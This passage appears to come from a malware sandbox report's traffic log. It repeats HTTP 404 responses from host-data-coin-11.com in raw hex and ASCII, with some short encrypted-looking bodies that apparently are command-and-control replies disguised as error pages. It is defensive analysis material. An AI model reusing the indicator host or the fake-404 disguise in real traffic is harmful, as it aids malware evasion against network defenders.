20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:40 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:40 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:41 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 14 Jan 2022 20:05:41 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 99 d6 08 56 3d 41 be f5 dc fc fb 49 f5 53 d2 31 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82OV=AIS1SG0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 96 d3 08 55 3b 43 be f4 d4 fc fc 43 eb 1e d1 6d bc 19 74 b6 50 a1 b9 70 b8 7b 07 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OU;CCmtPp{P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:05:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 43 4e c7 3d c2 ec 66 b5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevCN=fdP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 20:06:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 